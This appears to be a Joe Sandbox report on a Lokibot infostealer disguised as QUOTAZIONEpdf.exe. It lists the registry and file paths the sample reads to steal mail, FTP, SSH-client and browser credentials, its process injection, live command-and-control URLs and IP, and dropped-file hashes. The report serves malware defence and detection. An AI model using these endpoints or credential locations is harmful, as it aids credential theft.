          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe TID: 4772Thread sleep time: -840000s >= -30000s
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeThread delayed: delay time: 60000
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019E79A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EADC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EA5F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EA9E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019E9AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeMemory written: C:\Users\user\Desktop\QUOTAZIONEpdf.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00406069 GetUserNameW,

          Stealing of Sensitive Information:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to steal Mail credentials (via file registry)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: PopPassword
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: SmtpPassword
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery5SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading11NTDSSecurity Software Discovery1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTAZIONEpdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.QUOTAZIONEpdf.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.2.QUOTAZIONEpdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.1.QUOTAZIONEpdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          slimpackage.com5%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
          http://alphastand.win/alien/fre.php0%URL Reputationsafe
          http://alphastand.trade/alien/fre.php0%URL Reputationsafe
          http://alphastand.top/alien/fre.php0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://slimpackage.com/slimmain/five/fre.php9%VirustotalBrowse
          http://slimpackage.com/slimmain/five/fre.php100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          slimpackage.com
          		104.223.93.105
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://kbfvzoboss.bid/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.win/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.trade/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.top/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://slimpackage.com/slimmain/five/fre.phptrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorQUOTAZIONEpdf.exefalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorQUOTAZIONEpdf.exefalse
              		high
              http://www.ibsensoftware.com/QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              104.223.93.105
              		slimpackage.comUnited States
              		8100ASN-QUADRANET-GLOBALUStrue

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:553085
              Start date:14.01.2022
              Start time:09:51:34
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 41s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:QUOTAZIONEpdf.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@56/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 73.1% (good quality ratio 70.4%)
              • Quality average: 79.1%
              • Quality standard deviation: 27.8%
              HCA Information:
              • Successful, ratio: 88%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:52:41API Interceptor53x Sleep call for process: QUOTAZIONEpdf.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsr3B6A.tmp
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):250687
              Entropy (8bit):7.724868567895106
              Encrypted:false
              SSDEEP:3072:1DyoBWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qk:BZS6M6v0OSV/pShtRMtIzxdvg
              MD5:17CCB3C022F9B93E6E7E2A40C253DE9B
              SHA1:4D99B2643277CCA9B2FFC1DB5E9247212EA155F0
              SHA-256:AB11BFD0AF1FE8B3C42E933F37DFDA582152FFF477AA9DDE4EBB1ADFBD7BC72E
              SHA-512:E292772D295B45C85E79D6CE37F607F977F20F337DA679B6A2EA78D436631D6DAA9CB844D70A6239F851E1709309D94A0EB808C8AA949A0FB4393F3876333282
              Malicious:false
              Reputation:low
              Preview: v`......,...................!....I......._......^`..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):3.801392215291429
              Encrypted:false
              SSDEEP:24:e1GSb0JDlOErEcQeV3ax/+FBFUQahkFsAryvDTy2La5DTyxk8q6I1nPnRuV4MPgs:SgZF4h6FBFUQYXze9r6IPRuqStkx
              MD5:7F8DBC496B4EB973EC6509A63B7A4C01
              SHA1:E3E07E016B3A97604B94CBF8CB2C0FC0BF21033D
              SHA-256:4B229D563D725A5F994DEBF010F24F43D6078C18EF1D56628F9815372CA45FC6
              SHA-512:D4331F90CE80A5E95CF9E6DD008B6268C733B3A8D0C3CB6200511961126093D5FF0DE73D69F5689E9D7495EBAA8A69EBAE8089B45E080928BE2D37C9FF003E0D
              Malicious:false
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U.CU.CU.C...CT.C0..BZ.CU.Cw.C..BT.C..BT.C.QCT.C..BT.CRichU.C........PE..L....!.a...........!......................... ...............................P............@.......................... ..L.... .......0.......................@..L.................................................... ...............................text............................... ..`.rdata..j.... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\pdqlrunrcm
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:DOS executable (COM)
              Category:dropped
              Size (bytes):5136
              Entropy (8bit):6.121649200700411
              Encrypted:false
              SSDEEP:96:N+CSmQtQfy1mW8itQYKA36VwVmgEVBS0SNxjzvZOXVYBnZ5r:N+CSmQKK1mWBtQlAtVDEVtS7PvnPr
              MD5:B97AC6F1BFD2778EC14E068EBCEC96AE
              SHA1:AE5C7D27BE7135FD5765A337CBA06CAA65E943A9
              SHA-256:065853BAB7BD450615B9697F39486EB81AB42F34AA502BB8BBC9631FCA53C608
              SHA-512:AF68D42ED2C127C2354BAEE151F23C967386C215EF9523943D594D85F94C208EC3C31D20479DAE1D5C6CBDBB4CABED88B4EF1555C17C98A6737446971870C72E
              Malicious:false
              Reputation:low
              Preview: ....M..[..K<7[=...7.l.....7.l....[=.....&...[=...m..m....>........M..m..m....>........M..m..m....>.......M..m..m....>.......M.[e..\.h.6s.....y....M....[..+...U...U..+.h.9.....M.....7<.=.[..h+.....[....3=..m.9.m.8.m..6.m..9.m./.m.4].j.gF...gF.R..[..m..m..8........=..............[....=.4/.../4C..E...M..AA.7.l........#..k.....U.....M............U.....M.E...f...O.V....d.....fl.O.l....B.....f.B.O.J....H.....M..[.&.7.l................[e..j...............F.........].jL...yh.9s......J....yh.9.......J..h.h.6s....>fl.O.....>............>.m..H.....[e..j.[=..............E...M..[...7.l.......&........[e..j...............F.....;...]..Z......yh.9s......J.....yh.9.......J.....yh.9.......J.....+.h.8s......R.....yh.9.......J..h.h.6s....>f...O.....>......[e..j....U......m..m..m..m..m........[e..j.[=..............E...M..[..............[e..j...............F.....h...].jL...yh.9s......J....yh.9.......J..h.h.6s....>f.B.O.'...>..........m
              C:\Users\user\AppData\Local\Temp\wtmxan9q1x7moo
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):216745
              Entropy (8bit):7.990426242680324
              Encrypted:true
              SSDEEP:3072:uWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qi:SS6M6v0OSV/pShtRMtIzxdvgT
              MD5:BAC58EACE647B10E7E15CCD5BCB67309
              SHA1:60C8B10660CA6837C542855B77AA703139D6D02B
              SHA-256:C35DD027079BE254D7EE5FBA88646D3BB6DCBDED2356041512441E1FBF08A1AE
              SHA-512:6A1F087896210D9811C4E6352ED8D02323F50F1754FA3590B3DD1782F344689FD275D0375676D296BBBE4CA50399B83D39937CB52A2F7743012C442C8AEE4135
              Malicious:false
              Reputation:low
              Preview: =....wI0}<IQ..b.U..."%...?.).n.).....c....GP+.z...T.%..hW.....O..|..~..M.v]Q$.0.....) &w.i...n.........C.&Pb;...*........;u...2.....).PO.!...v......]....u;.[....9..p.|.A....A..i.y....9.}...Y."........]..J......n.|..B..Xp. ]J.yg..5.g......2I.P.b.a..."%j..?...n..r....c.....P+.z...T.%b..W'... /[.|....`....y...Q.w.]....!...H8Z.....[Z.....R......*.....:;&...Dpwn.b..e...[.L....|u...,m...,.+`PL.K..&..S.#.,m...k>..C...C....x..Q...."G..-.hk.N....~....9|..uO...-...&.y6..5.g. .wI }<I.0....A.."%...?..hn......O.c....GP+.z...T...pU....*...|x....`.@.K....Q.>.]...2..U..Z._...[.....R6.....k..*.....:;&...8pwn.b..e...[.L....|u...,m...,.+`PL.K..&..S.#.,m...k>..C...C..V...Q...."G..-.hk.N....~...n.|......k......yg..5.g. .wI }<I.0.b.U..."%..?.).n.).....c....GP+.z...T.%..hW'... ...|....`.@......Q.>.]...!...H8Z._...[Z.....R6......*.....:;&...Dpwn.b..e...[.L....|u...,m...,.+`PL.K..&..S.#.,m...k>..C...C..V...Q...."G..-.hk.N....~
              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
